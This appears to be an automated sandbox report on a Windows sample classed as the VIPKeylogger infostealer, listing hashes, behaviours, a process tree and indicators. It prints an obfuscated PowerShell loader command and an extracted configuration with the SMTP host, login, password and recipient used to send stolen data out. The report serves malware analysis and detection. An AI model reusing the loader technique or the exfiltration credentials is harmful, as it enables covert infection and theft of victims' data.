Analysis
-
max time kernel
142s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-01-2025 02:26
Static task
static1
Behavioral task
behavioral1
Sample
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Resource
win10v2004-20241007-en
General
-
Target
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
-
Size
635KB
-
MD5
9eeaa6c9ce625021ac21b5eb40fb73e7
-
SHA1
459fa22834028579136aebd1327a6ff8b6e654cb
-
SHA256
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739
-
SHA512
202fa2b529565bdf1e2691a12f3b91d5bc6303b5d926852048ed482a071491e8ecf98cc8be5fd1be743a82400db6a57f3ea4cbfd1eeb0586dcd508ba76b4dc50
-
SSDEEP
12288:lSDeMUQg8x4aKKnpDNsLXfzYoWg4IcQ9y3zf5ju9sis:SeMUQgUlNsvYoWdZtjBu/s
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 20 1080 msiexec.exe 22 1080 msiexec.exe 24 1080 msiexec.exe 26 1080 msiexec.exe 28 1080 msiexec.exe 46 1080 msiexec.exe 48 1080 msiexec.exe 52 1080 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 drive.google.com 20 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 45 checkip.dyndns.org 47 reallyfreegeoip.org 48 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1080 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1692 powershell.exe 1080 msiexec.exe -
pid Process 1692 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1080 msiexec.exe 1080 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1692 powershell.exe Token: SeIncreaseQuotaPrivilege 1692 powershell.exe Token: SeSecurityPrivilege 1692 powershell.exe Token: SeTakeOwnershipPrivilege 1692 powershell.exe Token: SeLoadDriverPrivilege 1692 powershell.exe Token: SeSystemProfilePrivilege 1692 powershell.exe Token: SeSystemtimePrivilege 1692 powershell.exe Token: SeProfSingleProcessPrivilege 1692 powershell.exe Token: SeIncBasePriorityPrivilege 1692 powershell.exe Token: SeCreatePagefilePrivilege 1692 powershell.exe Token: SeBackupPrivilege 1692 powershell.exe Token: SeRestorePrivilege 1692 powershell.exe Token: SeShutdownPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeSystemEnvironmentPrivilege 1692 powershell.exe Token: SeRemoteShutdownPrivilege 1692 powershell.exe Token: SeUndockPrivilege 1692 powershell.exe Token: SeManageVolumePrivilege 1692 powershell.exe Token: 33 1692 powershell.exe Token: 34 1692 powershell.exe Token: 35 1692 powershell.exe Token: 36 1692 powershell.exe Token: SeDebugPrivilege 1080 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4156 wrote to memory of 1692 4156 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe 82 PID 4156 wrote to memory of 1692 4156 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe 82 PID 4156 wrote to memory of 1692 4156 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe 82 PID 1692 wrote to memory of 1080 1692 powershell.exe 91 PID 1692 wrote to memory of 1080 1692 powershell.exe 91 PID 1692 wrote to memory of 1080 1692 powershell.exe 91 PID 1692 wrote to memory of 1080 1692 powershell.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe"C:\Users\Admin\AppData\Local\Temp\6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1080
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
336KB
MD5b596c196381704f7d59a4284460fee40
SHA1e0283afd032563bdf7222ab654641e9ed3d4de05
SHA2565f12d49bdb6c38d8af460d2e3080c3e2c8753fdcd4ec1b0ae5e2299c12b65ffd
SHA512a26a937f73427c23c1955ce370b213e8bcc13bff394ff350499e8ee04a696aafa3ce3c7b801e5e4c0583583a7a161d7cf732466da3a24594f414086531f54d8c
-
Filesize
72KB
MD544086e4e4b931eb543dac505a3a4a2be
SHA19746b2ed0c33673a36aefcee2aa8a410dbd5a0f6
SHA2563cb5d810d9693dbc418e3e864c4ed8c24d6e674819315166125028ed98ee3ca9
SHA512613c00f10f1ad3df1e56a05c6a770376b6000d04335fa73880c8c91635380ea46382a65e721267a61b98c5f8497f750bc26cee2f6cb5a6db42701c7edd6c2722
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82